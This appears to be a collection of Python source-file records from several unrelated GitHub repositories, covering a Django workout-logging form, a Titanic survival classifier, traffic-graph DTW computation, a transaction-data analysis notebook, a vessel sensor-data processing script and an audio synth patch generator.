instance.user_wod = user_wod\n instance.goal = self.goal\n if commit:\n instance.save()\n return instance\n\nclass UserWODForm(object):\n\n def __init__(self, user, wod, user_wod, prefix, data):\n \"\"\"\n Contruct a UserWOD form-container object, of sort which is capable\n of validation and saving\n\n :param user: User owning the UserWOD\n :param wod: WorkoutOfTheDay this User is performing\n :param user_wod: A pre-existing UserWOD (can be None)\n :param prefix: Form prefix, prevents POST data name collisions\n :param data: Default form data for child forms\n :return: self\n \"\"\"\n self.data = data\n self.user = user\n self.wod = wod\n self.user_wod = user_wod\n\n # Calculated\n self.prefix = 'wod-%s-%s' % (wod.id, prefix)\n self.workout_type = self.wod.workout.workout_type\n\n # Computed\n self.score_form = self.create_score_form()\n self.wod_exercise_forms = self.create_wod_exercise_forms()\n\n def create_score_form(self):\n \"\"\"\n Construct the appropriate score form for\n the WorkoutOfTheDay's workout_type\n :return: A django Form\n \"\"\"\n if self.workout_type == models.Workout.WORKOUT_TYPE_TIMED:\n if self.user_wod:\n initial = {'time': self.user_wod.time}\n else:\n initial = None\n return TimeForm(self.data, prefix=self.prefix, initial=initial)\n elif self.workout_type == models.Workout.WORKOUT_TYPE_AMRAP:\n if self.user_wod:\n initial = {'rounds': self.user_wod.rounds}\n else:\n initial = None\n return RoundsForm(self.data, prefix=self.prefix, initial=initial)\n elif self.workout_type == models.Workout.WORKOUT_TYPE_POWER:\n pass\n else:\n raise Exception('Unknown workout type')\n\n def create_wod_exercise_forms(self):\n \"\"\"\n Create children WODExerciseForms, one for each repetition of each\n exercise in the WorkoutOfTheDay's Workout\n :return: list of WODExerciseForms\n \"\"\"\n pairs = self.create_goal_wodexercise_pairs_iter()\n\n wod_exercise_forms = []\n\n for index, pair in enumerate(pairs):\n goal, wod_exercise = pair\n prefix = '%sex%s' % (self.prefix, index)\n wod_exercise_form = WODExerciseForm(goal, self.data,\n instance=wod_exercise, prefix=prefix)\n wod_exercise_forms.append(wod_exercise_form)\n\n return wod_exercise_forms\n\n def create_goal_wodexercise_pairs_iter(self):\n \"\"\"\n Pair the WorkoutOfTheDay's WorkoutExercise the the\n current UserWOD's WODExercises by goal (WorkoutExercise)\n If there is no current user_wod, pairs WorkoutExercises with None.\n :return: list of (WorkoutExercise, WODExercise)\n or (WorkoutExercise, None)\n \"\"\"\n goals = self.get_repeated_exercises(self.wod.workout)\n\n if not self.user_wod:\n # If there is no UserWOD, build (WorkoutExercise, None) tuples\n wod_exercises = [None] * len(goals)\n pairs = itertools.izip(goals, wod_exercises)\n else:\n # If there is a UserWOD, build (WorkoutExercise, WODExercise) tuples\n wod_exercises = self.user_wod.wod_exercises \\\n .order_by('goal__item_group', 'goal__order', 'pk')\n pairs = iterator.pair_left(goals, wod_exercises, match_once=True,\n searcher=lambda goal, wod_exercise: \\\n wod_exercise.goal.id == goal.id)\n pairs = iter(pairs)\n return pairs\n\n def get_repeated_exercises(self, workout):\n \"\"\"\n For each WorkoutExercise group in a Workout, yield that group repeated\n as necessary.\n\n For example, if the WorkoutExercise set looks like:\n - Exercise 1: Group A repeat 2x\n - Exercise 2: Group A repeat 2x\n - Exercise 3: Group B repeat 1x\n - Exercise 4: Group C repeat 2x\n - Exercise 5: Group C repeat 2x\n\n The resulting list is:\n > A1, A2, A1,A 2, B3, C4, C5, C4, C5\n :return: list of WorkoutExercise\n \"\"\"\n exercises = workout.exercises.order_by('item_group', 'order')\n return list(self.repeat_exercises_iter(exercises))\n\n def repeat_exercises_iter(self, exercises):\n \"\"\"\n Repeat exercises by `item_group,` `item_group_repeats` times\n :param goals: list of WorkoutExercise\n :return: longer list of WorkoutExercise\n \"\"\"\n group_items = collections.OrderedDict()\n\n # In order, add exercises to their respective group\n for exercise in exercises:\n group = exercise.item_group\n if group not in group_items:\n group_items[group] = []\n group_items[group].append(exercise)\n\n # For each group, yield the items in the groups `n` times\n for group, exercises in group_items.iteritems():\n exercise = exercises[0] # Use the first exercise as\n repeat = exercise.item_group_repeats\n for x in xrange(repeat):\n for exercise in exercises:\n yield exercise\n\n def is_valid(self):\n \"\"\"\n Validate each of the child forms this object has\n :return: Whether or not every child form validated\n \"\"\"\n valid = not self.score_form or self.score_form.is_valid()\n for wod_exercise_form in self.wod_exercise_forms:\n valid &= wod_exercise_form.is_valid()\n return valid\n\n def save(self, commit=True):\n \"\"\"\n Create or update a UserWOD with WODExercises\n :param commit: Whether or not to commit the UserWOD to the database\n :return: The new or updated UserWOD\n \"\"\"\n\n # Create a new UserWOD if we need to, or use the initial one\n if self.user_wod is None:\n user_wod = models.UserWOD(user=self.user, wod=self.wod)\n else:\n user_wod = self.user_wod\n\n # Save time OR rounds\n if self.workout_type == models.Workout.WORKOUT_TYPE_TIMED:\n user_wod.time = self.score_form.cleaned_data['time']\n user_wod.rounds = None\n elif self.workout_type == models.Workout.WORKOUT_TYPE_AMRAP:\n user_wod.time = None\n user_wod.rounds = self.score_form.cleaned_data['rounds']\n elif self.workout_type == models.Workout.WORKOUT_TYPE_POWER:\n user_wod.time = None\n user_wod.rounds = None\n else:\n raise Exception('Unknown workout type')\n\n # Create a list of WODExercises to save (or not)\n wod_exercises = []\n for wod_exercise_form in self.wod_exercise_forms:\n wod_exercise = wod_exercise_form.save(user_wod, commit=False)\n wod_exercises.append(wod_exercise)\n\n # If we need to commit, save the UserWOD 1st, then the related objects\n if commit:\n user_wod.save()\n for wod_exercise in wod_exercises:\n if wod_exercise is not None:\n ## wod_exercise would be none if the form above decided\n ## to not save one.\n wod_exercise.user_wod = user_wod\n wod_exercise.save()\n\n return user_wod\n","repo_name":"explodes/explod.io-paste","sub_path":"explodio/xfit/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":9743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2864400124","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np \nfrom sklearn.ensemble import RandomForestRegressor,RandomForestClassifier\n\n#讀data\n# SibSp = 手足 siblings / 配偶 spouses\n# Parch = 父母 parents / 小孩 children\n\n@st.cache(allow_output_mutation=True)\ndef load():\n\tdf=pd.read_csv(\"train.csv\")\n\treturn df\ndf=load()\n\ndtrain=df.filter(regex='Survived|Age|SibSp|Parch|Fare|Sex|Pclass')\n\t\n### 使用 RandomForestRegressor 填補缺失的年齡屬性\n\ndef set_missing_ages(df):\n \n # 把已有的數值型features取出来丟進RandomForestRegressor中\n age_df = df[['Age','Fare', 'Parch', 'SibSp', 'Pclass']]\n \n # 乘客分成已知年齡和未知年齡兩部分\n known_age = age_df[age_df.Age.notnull()]\n unknown_age = age_df[age_df.Age.isnull()]\n \n # y即目標年齡\n y = known_age.iloc[:, 0]\n\n # X即feature屬性值\n X = known_age.iloc[:, 1:]\n \n # fit到RandomForestRegressor之中\n rfr = RandomForestRegressor(random_state=0, n_estimators=500, n_jobs=-1)\n rfr.fit(X, y)\n \n # 用得到的模型進行未知年齡結果預測\n predictedAges = rfr.predict(unknown_age.iloc[:, 1:])\n\n # 用得到的預測結果填補原缺失data\n df.loc[ (df.Age.isnull()), 'Age' ] = predictedAges \n return df,rfr\n\t\ndtrain, rfr = set_missing_ages(dtrain)\n\ndef preprocessing(df): \n\t#familysize\n\tdf['Familysize']=df['Parch']+df['SibSp']\n\n\t#child\n\tdf[\"Child\"] = df[\"Age\"].apply(lambda x: 1 if x < 15 else 0)\n\t\n\t#Mother\n\tdf['Mother']='0'# DataFrame增加一直行\n\tdf.loc[(df['Sex']==str(\"female\")) & (df['Parch']>=1) ,'Mother']=1\n\treturn df\ndtrain=preprocessing(dtrain)\n\n#one hot encoding\ndef onehot(df):\n\td_Sex=pd.get_dummies(df['Sex'],prefix='Sex')\n\td_Pclass=pd.get_dummies(df['Pclass'],prefix='Pclass')\n\n\t#把處理後的新增回dtrain,df\n\tdf=pd.concat([df,d_Sex,d_Pclass],axis=1)\n\tdf.drop(['Sex','Pclass'],axis=1,inplace=True)\n\treturn df\ndtrain=onehot(dtrain)\n\n\ntrain_df=dtrain.filter(regex='Survived|Age|SibSp|Parch|Familysize|Fare|Sex_.*|Pclass_.*|Child|Mother')\n\n\n#y即Survival結果\ny = train_df['Survived'].values\n\n#X即features屬性值\nX = train_df.iloc[:, 1:].values\n\nrfr1 = RandomForestClassifier(n_estimators=500,criterion='gini',min_samples_split=12,min_samples_leaf=1,random_state=1,n_jobs=-1) \n\t\t\t\t\t\t\t \nrfr1.fit(X,y)\n\n#return a tuple\ndef makeprediction(df):\n\tprediction=rfr1.predict(df)\n\tprob=rfr1.predict_proba(df)\n\tprob_df=pd.DataFrame(prob,columns=['Dead','Survived'])\n\tdead_prob=prob_df.loc[0,'Dead']\n\tsurvived_prob=prob_df.loc[0,'Survived']\n\treturn dead_prob,survived_prob","repo_name":"ytchen175/Titanic_test","sub_path":"module/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"5990169437","text":"import csv\nimport os\nimport numpy as np\nfrom fastdtw import fastdtw\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport argparse\nimport pdb\nimport torch\nimport pandas as pd\n\nimport sys\nsys.path.append(\"..\")\n\nfrom trainer.dataloader import Dataset_Traffic\nfrom utils.data_utils import Single_Data_Container\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--city\", default=\"yizhuang\", type=str, help=\"specific fine-tune dataset\")\n parser.add_argument(\"--data_path\", default=\"../../data\", type=str)\n parser.add_argument(\"--flow_file\", default=\"2023_01_03_flow.csv\", type=str)\n parser.add_argument(\"--rel_file\", default=\"connect.csv\", type=str)\n parser.add_argument(\"--nfeat_file\", default=\"node_feature.csv\", type=str)\n parser.add_argument(\"--look_back\", default=24, type=int)\n parser.add_argument(\"--pred_len\", default=12, type=int)\n parser.add_argument(\"--time_dim\", default=4, type=int)\n parser.add_argument(\"--time_encode\", default=\"raw\", type=str)\n args = parser.parse_args()\n return args\n\n\ndef get_data(args):\n \"\"\" 单个城市数据加载器 \"\"\"\n data_dict = {\n args.city: {\n \"flow\": args.flow_file,\n \"rel\": args.rel_file,\n \"nfeat\": args.nfeat_file\n }\n }\n\n data = Single_Data_Container(data_path=args.data_path,\n data_dict=data_dict,\n look_back=args.look_back,\n pred_len=args.pred_len,\n time_encode=args.time_encode)\n\n train_data = Dataset_Traffic(data, mode=\"train\")\n\n res = []\n for idx in tqdm(range(train_data.__len__()), desc=\"collect training data\"):\n if idx % args.look_back == 0:\n x, _, _, _, _ = train_data.__getitem__(idx)\n res.append(x.T)\n \n res = np.array(res) # [K, T, N]\n return res, train_data\n\n\nif __name__ == \"__main__\":\n import os\n import sys\n args = get_args()\n\n train_data, dataset = get_data(args)\n num_node = len(dataset.nids)\n print(num_node)\n\n K, L, N = train_data.shape\n folds = int(288 / L)\n train_data = train_data[:int(K / folds) * folds]\n train_data = train_data.reshape(int(K / folds), folds, L, N)\n train_data = train_data.reshape(int(K / folds), -1, N)\n\n train_data = train_data.reshape(-1, N)\n train_data = dataset.scaler.inverse_transform(train_data)\n \n # train_data = train_data.reshape(-1, 288, N)\n train_data[np.isnan(train_data)] = 0\n train_data = train_data.reshape(-1, num_node, 1)\n\n # data: (K, N, C) 样本: 节点: 特征 \n\n ### DTW Distance\n if not os.path.exists(os.path.join(args.data_path, args.city, \"dtw_distance.npy\")):\n data_mean = np.mean([train_data[:, :, 0][24*12*i: 24*12*(i+1)] for i in range(train_data.shape[0]//(24*12))], axis=0)\n data_mean = data_mean.squeeze().T \n dtw_distance = np.zeros((num_node, num_node))\n for i in tqdm(range(num_node)):\n for j in range(i, num_node):\n dtw_distance[i][j] = fastdtw(data_mean[i], data_mean[j], radius=6)[0]\n for i in range(num_node):\n for j in range(i):\n dtw_distance[i][j] = dtw_distance[j][i]\n \n mean = np.mean(dtw_distance)\n std = np.std(dtw_distance)\n dtw_distance = (dtw_distance - mean) / std\n \n sigma = 0.1\n dtw_distance = np.exp(-dtw_distance ** 2 / sigma ** 2)\n dtw_matrix = np.zeros_like(dtw_distance)\n dtw_matrix[dtw_distance > 0.6] = 1\n\n np.save(os.path.join(args.data_path, args.city, \"dtw_distance.npy\"), dtw_matrix)\n print(f'average degree of semantic graph is {np.sum(dtw_matrix > 0)/2/num_node}')\n","repo_name":"zruiii/DeSTR","sub_path":"src/utils/STGODE_utils.py","file_name":"STGODE_utils.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1344918722","text":"\"\"\"Debug helper\n\nThe purpose of this file is to help during development.\n\nThe idea is to silence internal exceptions raised by Friendly\nitself for most users by redirecting them here, and have them\nprinted only when debugging mode is activated.\n\"\"\"\nimport sys\nimport os\n\n# DEBUG is set to True for me. It can also be set to True from __main__ or when\n# using the debug() command in the console.\n\nIS_PYDEV = bool(os.environ.get(\"PYTHONDEVMODE\", False))\nIS_ANDRE = r\"users\\andre\\github\\friendly\" in __file__.lower()\nDEBUG = IS_PYDEV or IS_ANDRE\nEXIT = False\n\n\ndef log(text):\n if DEBUG: # pragma: no cover\n print(text)\n\n\ndef log_error(exc=None):\n global EXIT\n if DEBUG: # pragma: no cover\n from . import explain_traceback\n\n if exc is not None:\n print(repr(exc))\n if not EXIT:\n EXIT = True\n explain_traceback()\n log(\"Fatal error - aborting\")\n sys.exit()\n","repo_name":"aroberge/friendly","sub_path":"friendly/debug_helper.py","file_name":"debug_helper.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":325,"dataset":"github-code","pt":"78"} +{"seq_id":"22828724773","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Business Understanding\n\n# Task 1: Segment the dataset and draw unique insights, including visualisation of the transaction volume and assessing the effect of any outliers.\n\n# # The Dataset\n# The synthesised transaction dataset contains 3 months’ worth of transactions for 100 hypothetical customers. It contains purchases, recurring transactions, and salary transactions.\n# \n# The dataset is designed to simulate realistic transaction behaviours that are observed in ANZ’s real transaction data, so many of the insights you can gather from the tasks below will be genuine.\n\n# ## Importing the required libraries\n\n# In[50]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# ## Reading the Dataset\n\n# In[5]:\n\n\nANZ = pd.read_excel(r\"C:\\Users\\seyi\\Downloads\\ANZ synthesised transaction dataset.xlsx\")\n\n\n# In[6]:\n\n\nANZ.head()\n\n\n# In[7]:\n\n\nANZ.info()\n\n\n# In[8]:\n\n\nANZ.shape\n\n\n# In the ANZ dataset, there are 23 different columns and 12043 observations\n\n# In[9]:\n\n\nANZ.columns\n\n\n# In[10]:\n\n\nANZ.describe()\n\n\n# To confirm that we are dealing with 100 hypothetical customers:\n\n# In[11]:\n\n\nANZ['account'].nunique()\n\n\n# ## Taking the relevant features\n\n# In[12]:\n\n\nANZ = ANZ[[\"status\",\"card_present_flag\",\"balance\",\"date\",\n \"gender\",\"age\",\"merchant_suburb\",\"merchant_state\",\n \"amount\",\"customer_id\",\"movement\"]]\nANZ[\"date\"] = pd.to_datetime(ANZ[\"date\"])\nANZ.head()\n\n\n# In[13]:\n\n\nNull_values = ANZ.isnull().sum().sort_values(ascending=False)\n\n\n# In[14]:\n\n\nNull_values\n\n\n# ## Exploratory Data Analysis (including Visualizations)\n\n# ### Total number of autorized and posted status\n\n# In[15]:\n\n\nANZ['status'].value_counts()\n\n\n# ### Total number of transactions made on each day\n\n# In[16]:\n\n\nANZ['date'].value_counts()\n\n\n# ### Total number of transactions made by each customer\n\n# In[17]:\n\n\nANZ['customer_id'].value_counts()\n\n\n# ### Transaction volume made by customers each day\n\n# In[18]:\n\n\nANZ_date_count = ANZ.groupby('date').count()\n\n\n# In[19]:\n\n\ntransaction_volume = ANZ_date_count['customer_id'].mean()\n\n\n# In[20]:\n\n\nlength = len(ANZ_date_count.index)\n\n\n# In[21]:\n\n\nplt.figure()\nplt.plot(ANZ_date_count.index, ANZ_date_count[\"customer_id\"], c=\"blue\", label = \"Customer ID\")\nplt.plot(ANZ_date_count.index, np.linspace(transaction_volume,transaction_volume,length), c=\"g\", label = \"mean transaction volume\")\nplt.title(\"ANZ Transaction Volume vs. Date\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Number of customers\")\nplt.legend()\nplt.tight_layout()\n\n\n# ## What is the average transaction amount?\n\n# In[22]:\n\n\nANZ_date_mean = ANZ.groupby('date').mean()\n\n\n# In[23]:\n\n\ntransaction_amount = ANZ_date_count['amount'].mean()\n\n\n# In[24]:\n\n\nlength = len(ANZ_date_count.index)\n\n\n# In[25]:\n\n\nplt.figure()\nplt.plot(ANZ_date_count.index, ANZ_date_mean[\"amount\"], c=\"red\", label = \"Amount\")\nplt.plot(ANZ_date_count.index, np.linspace(transaction_amount,transaction_amount,length), c=\"b\", label = \"Overall mean transaction amount\")\nplt.title(\"ANZ mean Transaction Amount vs. Date\")\nplt.xlabel(\"Date\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# ## What is the average customer balance and payment amount by Age\n\n# In[26]:\n\n\nmonths = []\nfor date in ANZ[\"date\"]:\n if date.month == 8:\n months.append(\"August\")\n elif date.month == 9:\n months.append(\"September\")\n elif date.month == 10:\n months.append(\"October\")\n\nANZ[\"Months\"] = months\nANZ[\"Months\"].head()\n\n\n# ### For August:\n\n# In[27]:\n\n\nANZ_cus_aug = ANZ[ANZ[\"Months\"] == \"August\"].groupby(\"customer_id\").mean()\n\n\n# In[28]:\n\n\nANZ_gen_aug = ANZ[ANZ[\"Months\"] == \"August\"].groupby(\"gender\").mean()\n\n\n# In[29]:\n\n\nmean_f_bal_aug = ANZ_gen_aug[\"balance\"].iloc[0]\nmean_m_bal_aug = ANZ_gen_aug[\"balance\"].iloc[1]\nlength = len(ANZ_cus_aug[\"age\"])\n\n\n# In[47]:\n\n\nplt.figure()\nplt.scatter(ANZ_cus_aug[\"age\"], ANZ_cus_aug[\"balance\"], c=\"red\", label=\"Balance\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_f_bal_aug,mean_f_bal_aug,length), c=\"g\", label = \"mean female balance\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_m_bal_aug,mean_m_bal_aug,length), c=\"b\", label = \"mean male balance\")\nplt.title(\"ANZ Average Customer Balance vs. Age for August\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Balance ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# In[31]:\n\n\nmean_f_amt_aug = ANZ_gen_aug[\"amount\"].iloc[0]\nmean_m_amt_aug = ANZ_gen_aug[\"amount\"].iloc[1]\n\n\n# In[48]:\n\n\nplt.scatter(ANZ_cus_aug[\"age\"], ANZ_cus_aug[\"amount\"], c=\"orange\", label=\"Amount\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_f_amt_aug,mean_f_amt_aug,length), c=\"r\", label = \"mean female amount\")\nplt.plot(ANZ_cus_aug[\"age\"], np.linspace(mean_m_amt_aug,mean_m_amt_aug,length), c=\"b\", label = \"mean male amount\")\nplt.title(\"ANZ Customer Average Payment Amount vs. Age for August\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# ### For September:\n\n# In[33]:\n\n\nANZ_cus_sep = ANZ[ANZ[\"Months\"] == \"September\"].groupby(\"customer_id\").mean()\nANZ_gen_sep = ANZ[ANZ[\"Months\"] == \"September\"].groupby(\"gender\").mean()\n\n\n# In[34]:\n\n\nmean_f_bal_sep = ANZ_gen_sep[\"balance\"].iloc[0]\nmean_m_bal_sep = ANZ_gen_sep[\"balance\"].iloc[1]\nlength = len(ANZ_cus_sep[\"age\"])\n\n\n# In[49]:\n\n\nplt.figure()\nplt.scatter(ANZ_cus_sep[\"age\"], ANZ_cus_sep[\"balance\"], c=\"grey\", label=\"Balance\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_f_bal_sep,mean_f_bal_sep,length), c=\"r\", label = \"mean female balance\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_m_bal_sep,mean_m_bal_sep,length), c=\"b\", label = \"mean male balance\")\nplt.title(\"ANZ Customer Balance vs. Age for September\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Balance ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# In[36]:\n\n\nmean_f_amt_sep = ANZ_gen_sep[\"amount\"].iloc[0]\nmean_m_amt_sep = ANZ_gen_sep[\"amount\"].iloc[1]\n\n\n# In[37]:\n\n\nplt.scatter(ANZ_cus_sep[\"age\"], ANZ_cus_sep[\"amount\"], c=\"green\", label=\"Amount\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_f_amt_sep,mean_f_amt_sep,length), c=\"r\", label = \"mean female amount\")\nplt.plot(ANZ_cus_sep[\"age\"], np.linspace(mean_m_amt_sep,mean_m_amt_sep,length), c=\"b\", label = \"mean male amount\")\nplt.title(\"ANZ Customer mean Payment Amount vs. Age for September\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# ### For October:\n\n# In[38]:\n\n\nANZ_cus_oct = ANZ[ANZ[\"Months\"] == \"October\"].groupby(\"customer_id\").mean()\nANZ_gen_oct = ANZ[ANZ[\"Months\"] == \"October\"].groupby(\"gender\").mean()\n\n\n# In[39]:\n\n\nmean_f_bal_oct = ANZ_gen_oct[\"balance\"].iloc[0]\nmean_m_bal_oct = ANZ_gen_oct[\"balance\"].iloc[1]\nlength = len(ANZ_cus_oct[\"age\"])\n\n\n# In[40]:\n\n\nplt.figure()\nplt.scatter(ANZ_cus_oct[\"age\"], ANZ_cus_oct[\"balance\"], c=\"black\", label=\"Balance\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_f_bal_oct,mean_f_bal_oct,length), c=\"r\", label = \"mean female balance\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_m_bal_oct,mean_m_bal_oct,length), c=\"b\", label = \"mean male balance\")\nplt.title(\"ANZ Customer Balance vs. Age for October\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Balance ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# In[41]:\n\n\nmean_f_amt_oct = ANZ_gen_oct[\"amount\"].iloc[0]\nmean_m_amt_oct = ANZ_gen_oct[\"amount\"].iloc[1]\n\n\n# In[42]:\n\n\nplt.scatter(ANZ_cus_oct[\"age\"], ANZ_cus_oct[\"amount\"], c=\"purple\", label=\"Amount\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_f_amt_oct,mean_f_amt_oct,length), c=\"r\", label = \"mean female amount\")\nplt.plot(ANZ_cus_oct[\"age\"], np.linspace(mean_m_amt_oct,mean_m_amt_oct,length), c=\"b\", label = \"mean male amount\")\nplt.title(\"ANZ Customer mean Payment Amount vs. Age for October\")\nplt.xlabel(\"Age (years)\")\nplt.ylabel(\"Amount ($)\")\nplt.legend()\nplt.tight_layout()\n\n\n# Using an heatmap: \n\n# In[46]:\n\n\ncorrmat = ANZ.corr()\nf, ax = plt.subplots(figsize=(12, 9))\nsns.heatmap(corrmat, vmax=.8, square=True);\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Drimdave/My-ANZ-Internship-Work","sub_path":"Exploratory Data Analysis using the ANZ Synthesized Transaction Dataset.py","file_name":"Exploratory Data Analysis using the ANZ Synthesized Transaction Dataset.py","file_ext":"py","file_size_in_byte":7856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9939385199","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 23 14:32:42 2019\n\nFeb 28,2020 Mingchao\n input local time,then change the time style in functions of raw_tele_modules for filtering the data\nAPR 29,2020 Mingchao\n add TimeoutError, in case upload data to student drifter have issue\nMay 6,2020 Mingchao\n change the function of up.sd2drf for being suitable with Windows\n@author: leizhao\n\"\"\"\n\nimport raw_tele_modules as rdm\nfrom datetime import datetime,timedelta\nimport os\nimport upload_modules as up\nimport ftpdownload\n\n\ndef week_start_end(dtime,interval=0):\n '''input a time, \n if the interval is 0, return this week monday 0:00:00 and next week monday 0:00:00\n if the interval is 1,return last week monday 0:00:00 and this week monday 0:00:00'''\n delta=dtime-datetime(2003,1,1,0,0)-timedelta(weeks=interval)\n count=int(delta/timedelta(weeks=1))\n start_time=datetime(2003,1,1,0,0)+timedelta(weeks=count)\n end_time=datetime(2003,1,1,0,0)+timedelta(weeks=count+1) \n return start_time,end_time \ndef main():\n realpath=os.path.dirname(os.path.abspath(__file__))\n #realpath='E:/programe/raw_data_match/py'\n parameterpath=realpath.replace('py','parameter')\n #HARDCODING\n raw_data_name_file=os.path.join(parameterpath,'raw_data_name.txt') #this data conclude the VP_NUM HULL_NUM VESSEL_NAME\n #raw_data_name_file='E:/programe/raw_data_match/parameter/raw_data_name.txt'\n output_path=realpath.replace('py','result') #use to save the data \n telemetry_status=os.path.join(parameterpath,'telemetry_status.csv')\n #telemetry_status='E:/programe/aqmain/parameter/telemetry_status.csv'\n lack_data_path=os.path.join(output_path, 'lack_data.txt')\n #lack_data_path='E:/programe/raw_data_match/result/lack_data.txt'#store the name of file that lacked data after 'classfy finished'\n # below hardcodes is the informations to upload local data to student drifter. \n subdir=['Matdata','checked']\n mremote='/Raw_Data'\n #mremote='\\Raw_Data'\n remote_subdir=['Matdata','checked']\n ###########################\n end_time=datetime.utcnow()\n #start_time,end_time=week_start_end(end_time,interval=1)\n start_time=end_time-timedelta(weeks=1)\n #download raw data from website\n files=ftpdownload.download(localpath='E:\\\\programe\\\\raw_data_match\\\\result\\\\Matdata', ftppath='/Matdata')\n #classify the file by every boats\n rdm.classify_by_boat(indir='E:\\\\programe\\\\raw_data_match\\\\result\\\\Matdata',outdir='E:\\\\programe\\\\raw_data_match\\\\result\\\\classified',pstatus=telemetry_status)\n print('classfy finished!')\n #check the reformat of every file:include header,heading,lat,lon,depth,temperature.\n rdm.check_reformat_data(indir='E:\\\\programe\\\\raw_data_match\\\\result\\\\classified',outdir='E:\\\\programe\\\\raw_data_match\\\\result\\\\checked',startt=start_time,\\\n endt=end_time,pstatus=telemetry_status,rdnf=raw_data_name_file,lack_data=lack_data_path)\n print('check format finished!')\n for i in range(len(subdir)):\n local_dir=os.path.join(output_path,subdir[i])\n #remote_dir=os.path.join(mremote,remote_subdir[i])\n remote_dir=os.path.join(mremote,remote_subdir[i]).replace('\\\\', '/')\n #up.sd2drf(local_dir,remote_dir,filetype='csv',keepfolder=True)\n try:\n up.sd2drf(local_dir, remote_dir, filetype='csv', keepfolder=True)\n except TimeoutError:\n print('Timeout Error')\nif __name__=='__main__':\n main()","repo_name":"Mingchao19960125/Others","sub_path":"2020_weekly/check_csv.py","file_name":"check_csv.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31577470889","text":"import sys\ndef myord(k):\n if (k >= 'a' and k <= 'z'):\n return ord(k) - ord('a') + 1\n if (k >= 'A' and k <= 'Z'):\n return ord(k) - ord('A') + 27\n raise Exception('Invalid letter: ' + k)\ndef common(s1, s2):\n c = ''\n for k1 in s1:\n for k2 in s2:\n if (k1 == k2):\n c += k1\n return c\ni = 0\nc = ''\nt = 0\nfor r in map(str.rstrip, sys.stdin):\n if (i == 0):\n c = r\n else:\n c = common(c, r)\n if (i == 2):\n o = myord(c[0])\n t += o\n print(c, o)\n i = 0\n else:\n i = i + 1\nprint(t)\n","repo_name":"lapo-luchini/advent","sub_path":"2022/03b.py","file_name":"03b.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"71307098813","text":"import SynthPy as sp\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport gc\n\n\nCHUNK_SIZE = 1000\nTRAIN_SET_SIZE = 100000\nTEST_SET_SIZE = 10000\nTRAIN_SET_PATCH_DIR = 'Train_Patches'\nTEST_SET_PATCH_DIR = 'Test_Patches'\nPLUGIN_PATH = 'E:/VST/u-he/Diva.dll'\n\n\nif not os.path.exists(TRAIN_SET_PATCH_DIR):\n os.makedirs(TRAIN_SET_PATCH_DIR)\nif not os.path.exists(TEST_SET_PATCH_DIR):\n os.makedirs(TEST_SET_PATCH_DIR) \n\n# Generate Training Set\ndef gen_data(host, train=True):\n data_set = []\n generator = sp.PatchGenerator(host)\n\n for data_patch in tqdm(range(1,TRAIN_SET_SIZE+1)):\n\n patch = generator.get_random_patch()\n host.set_patch(patch)\n host.render_patch(72, 127, 1.0, 4.0)\n params = np.array([i[1] for i in patch])\n data_set.append(np.array([np.array(host.get_audio_frames()), params]))\n\n if data_patch % CHUNK_SIZE == 0:\n data_set = np.array(data_set)\n if train:\n with open(f'{TRAIN_SET_PATCH_DIR}/{data_patch}.spatch', 'wb') as f:\n np.save(f, data_set)\n else:\n with open(f'{TEST_SET_PATCH_DIR}/{data_patch}.spatch', 'wb') as f:\n np.save(f, data_set)\n data_set = []\n gc.collect()\n\nif __name__ == '__main__':\n host = sp.Host(44100, 512, 512)\n\n if host.load_plugin(PLUGIN_PATH):\n print('Plugin Loaded!')\n \n # generate train:\n print('Generating training data...')\n gen_data(host)\n\n # gen test:\n print('Generating testing data...')\n gen_data(host, train=False)\n\n 